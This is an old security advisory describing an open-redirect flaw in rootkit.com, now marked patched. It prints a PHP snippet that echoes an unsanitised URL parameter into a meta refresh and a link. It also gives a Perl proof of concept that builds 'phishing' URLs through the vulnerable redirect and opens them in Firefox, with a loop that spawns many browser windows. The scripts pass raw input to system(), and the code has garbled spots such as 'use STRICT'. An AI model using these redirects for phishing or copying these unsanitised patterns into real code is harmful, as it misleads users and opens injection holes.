Rootkit.com : Prone To Redirection and Looping Attacks.

Vulnerability : Patched


zeroknock [at] secniche.org


For Education Purposes Only!


Redirection Analysis.

The rootkit is the famous rootkit technology site. The site is prone to redirection attacks and looping manipulation. The domain forwarding or URL forwarding not only directly possible through the website but can be called from third party directly. This makes the website prone to redirection attacks and traffic manipulation. The context in which this attack is undertaken is very stringent. Before getting into detail lets perform a single test through Google. In this we will check any redirect parameter is present in the meta contents of website or not. Look at the pick.





Why this happens ?

There can be two reasons:
1.The very basic reason is the site wont allow search engines spider to crawl through the robots.txt or the configuration in that file must be in "Disallow" state.

2.The second reason can be there is no search meta elements will be provided in the header tags of the php web page.

The reason can be anything .But the google results are not even so fruitful always. According to google there is no such page exists.Lets see how exactly the URL obfuscation designed in PHP. 

	  		<?php
	 	 	/* Put into the public domain */
	 	 	/* Will redirect a URL */
	 	 	$u=$_GET['url'];
	 	 	?>
	 	 	
	 	 	<meta http-equiv="refresh" content="0; URL=<?php echo($u);> ?">
	 	 	You should be able to be redirected to <a href="<?php echo($u); ?>">
	 	 	<?php 	echo($u); ?></a>>
Thats how exactly the things work. Remember , The HTTP protocol requires that the redirect be sent all by itself, without any web page data. As a result, the web programmer who is using a scripting language to redirect the user's browser to another page must ensure that the redirect is the first or only part of the response. In the ASP scripting language, this can also be accomplished using the methods response.buffer=true and response.redirect "http://www.example.com". Using PHP, one can use header("Location: http://www.example.com").

At this point of time we get to the base and google has played its part. Ha!. The rootkit possesses this redirection vulnerability and it can be programmed to launch looping attacks in browser. The attacks can be of :

1.Looping with single domain forwarding.
2.Looping with multiple domain forwarding.

The single domain forwarding states to redirect traffic through vulnerable link to single destination. The multiple concept makes it to redirect to the number of sites. We will demonstrate it one by one.

Upon searching the website directly I found that the vulnerable link is:
http://www.rootkit.com/redirect.php?[Redirected URL]

	use STRICT;
	
	print "[*] Redirection | Looping Attacks : Rootkit.com\n";
	print "[*] POC By: zeroknock [at] secniche.org\n\n";
	print "[*] Note : Set Firefox In The Default Path As Path=\n\n";
	die "[*] Usage : $0 \n[*] $0 http://www.slashdot.org\n" unless @ARGV==1;
	
	my $exploited_url="http://www.rootkit.com/redirect.php?";
	print "[*] Base URL : $exploited_url \n";
	my $website_hit = $ARGV[0];
	print "[*] Redirected URL : $website_hit\n";
	my $phishing = $exploited_url.$website_hit;
	print "[*] Phishing URL : $phishing\n";
	
	system("firefox $phishing");
	print "[*] Firefox Fired!\n";
	print "[*] Redirection Successfull!\n";


You can use the same script with looping that fires the number of child browsers.One can also exploits it through iframe tags.Also arrays can be designed with attack websites that has to be redirected and can be put into a script.First look at the looping stuff.

	
	for($temp=1 ; $temp < 10; $temp ++)
	{
		my $exploited_url="http://www.rootkit.com/redirect.php?";
	 	my $website_hit = $ARGV[0];
	 	my $phishing = $exploited_url.$website_hit;
	 	system("firefox $phishing");
	}
Note
This information can be captured in several ways. One way involves URL redirection. Instead of sending the visitor straight to the other site, links on the site can direct to a URL on the original website's domain that automatically redirects to the real target. This added request will leave a trace in the server logs saying exactly which link was followed. This technique is also used by some corporate websites to have a "warning" page that the content is off-site and not necessarily affiliated with the corporation. This technique does bear the downside in the delay of an additional request to the original website's server, even if the redirect is set to fire in 0 seconds. For websites that wish to display a "warning" page before automatically forwarding, the length of time the warning is displayed is an additional delay.



The Redirection Attack Check:

Get To Google.

Get To SecNiche.

Get To Microsoft.

The Analysis is All done!